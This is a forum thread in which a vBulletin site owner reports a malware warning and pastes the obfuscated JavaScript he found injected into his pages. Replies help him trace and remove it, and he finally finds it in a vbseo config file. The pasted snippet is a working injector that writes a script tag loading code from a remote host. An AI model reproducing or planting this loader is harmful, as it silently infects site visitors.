Hello,
I am hoping someone can help me out here. MY site is being reported as being infected with malware. If i look at the source code I can see

http://www.talkdisney.com/forums/wdw-theme-parks/

<script type="text/javascript">
var RSrAHsQFTSZ = "GXlLD17GXlLD29"; var rTOwsCKOsBB0 = "GXlLD3cGXlLD73GXlLD"; var rTOwsCKOsBB1 = "63GXlLD72GXlLD69GXl"; var rTOwsCKOsBB2 = "LD70GXlLD74GXlLD20G"; var rTOwsCKOsBB3 = "XlLD73GXlLD72GXlLD6"; var rTOwsCKOsBB4 = "3GXlLD3dGXlLD22GXlL"; var rTOwsCKOsBB5 = "D68GXlLD74GXlLD74GX"; var rTOwsCKOsBB6 = "lLD70GXlLD3aGXlLD2f"; var rTOwsCKOsBB7 = "GXlLD2fGXlLD78GXlLD"; var rTOwsCKOsBB8 = "74GXlLD6fGXlLD70GXl"; var rTOwsCKOsBB9 = "LD2eGXlLD73GXlLD65G"; var rTOwsCKOsBB10 = "XlLD72GXlLD76GXlLD6"; var rTOwsCKOsBB11 = "5GXlLD70GXlLD69GXlL"; var rTOwsCKOsBB12 = "D63GXlLD73GXlLD2eGX"; var rTOwsCKOsBB13 = "lLD63GXlLD6fGXlLD6d"; var rTOwsCKOsBB14 = "GXlLD2fGXlLD2fGXlLD"; var rTOwsCKOsBB15 = "6dGXlLD6cGXlLD2eGXl"; var rTOwsCKOsBB16 = "LD70GXlLD68GXlLD70G"; var rTOwsCKOsBB17 = "XlLD22GXlLD3eGXlLD2"; var rTOwsCKOsBB18 = "0GXlLD3cGXlLD2fGXlL"; var rTOwsCKOsBB19 = "D73GXlLD63GXlLD72GX"; var rTOwsCKOsBB20 = "lLD69GXlLD70GXlLD74"; var rTOwsCKOsBB21 = "GXlLD3e"; var ZrWBlSVWKBL = "MWp2m17GXlLD29"; var GwA9juVrobG = rTOwsCKOsBB0 + rTOwsCKOsBB1 + rTOwsCKOsBB2 + rTOwsCKOsBB3 + rTOwsCKOsBB4 + rTOwsCKOsBB5 + rTOwsCKOsBB6 + rTOwsCKOsBB7 + rTOwsCKOsBB8 + rTOwsCKOsBB9 + rTOwsCKOsBB10 + rTOwsCKOsBB11 + rTOwsCKOsBB12 + rTOwsCKOsBB13 + rTOwsCKOsBB14 + rTOwsCKOsBB15 + rTOwsCKOsBB16 + rTOwsCKOsBB17 + rTOwsCKOsBB18 + rTOwsCKOsBB19 + rTOwsCKOsBB20 + rTOwsCKOsBB21; var wa79vdAM5Lo = "wqOw517CEXvL29"; tZlMHObzT1T = GwA9juVrobG.replace(/GXlLD/g,"%"); var FwL4HjvTvmP=unescape;var RSrAHsQFTSZ = "CEXvL17MWp2m29"; q9124=this; var Bu91Qzp2Fxa= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Bu91Qzp2Fxa.write(FwL4HjvTvmP(tZlMHObzT1T));
</script>


But I can not find this in the templates or database to remove it. Any ideas on how to fix this?


After a little more research it also seems to only show up in IE not in firefox?
Thanks,
ryan

Tried to look at your site but avast popped up a malicious url blocked warning, info might help you, will send it via pm

I had a very similar problem just recently. Do you happen to have MGC chatbox installed?

You should look through your .js files, as that's where I found lots of copies of it.

@Kylek thanks for the info in PM Lookign now but so far no luck

@ZomgStuff - What did you look for in the .js files?

Thanks for any help!

@Kylek thanks for the info in PM Lookign now but so far no luck

@ZomgStuff - What did you look for in the .js files?

Thanks for any help!

If you have a custom mod like a chatbox or any custom mods simply replace all the .js files of that mod w/ a fresh downloaded copy.

AdminCP > Maintenance > Diagnostics > Suspect File Versions

*Now, not all files are "suspect" or "bad" but that will help you track down the files if you are unaware of them all. Be sure to check your .js files as mentioned above and also check your templates for any iframes so search in templates for

<IFRAME SRC="whatever.html"

Leave the part after the = off so you can find all instances, some of these malicious scripts utilize iframes, there is a currently popular iframe and js baddy for Word Press atm so if you have that installed this could be the aftermath if they hacked your site via an exploit.

Found it in my vbseo config file. no idea how it got there but its gone now. Thanks for all your help.

I would definetly secure your files after seeing that